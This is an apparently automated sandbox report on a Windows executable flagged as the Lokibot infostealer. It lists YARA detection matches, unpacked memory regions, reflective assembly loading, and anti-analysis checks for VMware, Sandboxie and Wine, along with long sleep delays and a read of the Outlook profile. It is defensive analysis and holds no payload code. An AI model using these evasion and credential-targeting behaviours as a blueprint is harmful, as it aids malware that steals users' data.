              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A27E
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A849
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A649
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A376
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A977
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A149
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A549
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_00B8A749
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_0158C37C
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_0158E2F0
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_0158E2E0
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_05A6B6F0
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_05A69F66
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_05A69F74
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_07649318
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_0764D1C8
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A849
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A149
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A549
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A977
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A649
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A27E
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A749
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 4_2_0041A376
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNativeVariant.dll" vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.279934838.0000000003131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloneHelper.dll4 vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000000.242761502.0000000000BFA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.283271827.0000000007620000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNativeVariant.dll" vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.283139056.00000000075F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCloneHelper.dll4 vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.280759800.0000000004139000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTweenEngineAPI.dllD vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.283568185.0000000007790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTweenEngineAPI.dllD vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000004.00000000.272515723.000000000048A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000005.00000002.519673669.0000000000C9A000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exe Binary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: hfyhigXccT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Users\user\Desktop\hfyhigXccT.exe "C:\Users\user\Desktop\hfyhigXccT.exe"
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Process created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Process created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Process created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Process created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hfyhigXccT.exe.log
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@34/2
              Source: hfyhigXccT.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: hfyhigXccT.exe, Main.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 0.0.hfyhigXccT.exe.b80000.0.unpack, Main.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 0.2.hfyhigXccT.exe.b80000.0.unpack, Main.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.2.hfyhigXccT.exe.410000.0.unpack, Main.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.0.hfyhigXccT.exe.410000.1.unpack, Main.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.0.hfyhigXccT.exe.410000.2.unpack, Main.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\Desktop\hfyhigXccT.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\hfyhigXccT.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\hfyhigXccT.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\hfyhigXccT.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\hfyhigXccT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: hfyhigXccT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: hfyhigXccT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Yara match File source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: hfyhigXccT.exe PID: 6448, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: hfyhigXccT.exe PID: 6764, type: MEMORYSTR
              Source: hfyhigXccT.exe, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.hfyhigXccT.exe.b80000.0.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.hfyhigXccT.exe.b80000.0.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.hfyhigXccT.exe.410000.0.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.1.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.2.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.3.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.hfyhigXccT.exe.410000.0.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.7.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.hfyhigXccT.exe.c20000.1.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.5.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.11.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.1.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.13.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.2.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.0.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.15.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.3.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.hfyhigXccT.exe.c20000.9.unpack, Main.cs .Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_0158C4F4 push esp; iretd 0_2_0158F571
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_0158EC28 push esp; retf 0_2_0158EC29
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_05A69DF7 push E801005Eh; retf 0_2_05A69E01
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Code function: 0_2_05A61FE8 pushad ; retf 0_2_05A61FF1
              Source: initial sample Static PE information: section name: .text entropy: 7.609356662747534
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Process information set: NOOPENFILEERRORBOX (identical entry listed 36 times in the report)
              Source: C:\Users\user\Desktop\hfyhigXccT.exe Process information set: NOGPFAULTERRORBOX (identical entry listed 115 times in the report)

              Malware Analysis System Evasion

              Source: Yara match | File source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: hfyhigXccT.exe PID: 6448, type: MEMORYSTR
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\hfyhigXccT.exe TID: 6484 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\hfyhigXccT.exe TID: 6768 | Thread sleep time: -240000s >= -30000s
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Thread delayed: delay time: 60000
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Memory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Process created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Users\user\Desktop\hfyhigXccT.exe VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
